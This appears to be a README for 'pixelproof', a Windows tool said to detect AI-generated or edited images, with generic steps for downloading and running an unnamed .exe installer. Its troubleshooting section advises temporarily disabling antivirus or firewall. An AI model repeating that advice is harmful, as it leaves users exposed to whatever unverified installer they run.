pixelproof helps you find fake, AI-generated, or edited images fast. It checks photos to show if they may be altered or made with artificial intelligence. You don’t need any special skills to use it. The app works on Windows computers and runs in just a few clicks.

Your Windows PC can run pixelproof with no setup needed beyond download and install. Follow these steps:
Click the big green button below to visit the page where you can download the software.
This page has the latest version ready for download.
- Open your web browser and go to the download page linked above.
- Look for the file named like
pixelproof-setup.exeor similar. This is the installer. - Click on the file name to start the download. It may take a few minutes depending on your internet speed.
- Once the download finishes, find the file in your “Downloads” folder.
- Double-click the installer file to open it.
- Follow the on-screen steps:
- Accept the license agreement.
- Choose the folder where you want pixelproof installed (the default is fine).
- Click “Install” to start.
- Wait while the installer copies the files.
- When it finishes, click “Finish.” pixelproof is now on your computer.
- Find the pixelproof icon on your Desktop or in your Start menu.
- Double-click it to open the app.
- You will see a simple window with a button to add an image.
- Click the button and browse to any photo you want to check.
- Select the file and wait a few seconds.
- pixelproof will show you if it found signs of editing or AI creation.
- It also lists details like image metadata and any hidden info detected.
pixelproof scans images for signs like these:
- Inconsistent lighting or shadows
- Sudden changes in pixels that don't match the rest of the image
- Abnormal or missing EXIF data (details about when and how the photo was taken)
- Patterns common in AI-generated images
- Hidden messages or data embedded in the picture files
You can change some options in pixelproof to fit your needs:
- Choose which types of checks you want to run
- Set how deep the scan goes, balancing speed vs. detail
- Save reports with analysis results in simple text files
Settings can be found under the “Options” menu in the app’s top bar.
- For best results, use original or high-quality images.
- Avoid compressed images like those from social media; they lose many details.
- Run checks on multiple images to compare results.
- Keep the app updated by checking the website regularly.
pixelproof uses common methods from image forensics. This field studies photo details to spot truths or manipulation. Techniques include analyzing EXIF data and pixel patterns. You do not need to know this to use pixelproof, but it may help to understand the reports.

If pixelproof does not open or crashes:
- Make sure your Windows is updated.
- Restart your computer and try again.
- Install the latest version of the software from the download page.
- Check that you have enough disk space and RAM free.
- Disable antivirus or firewall temporarily if you suspect interference.
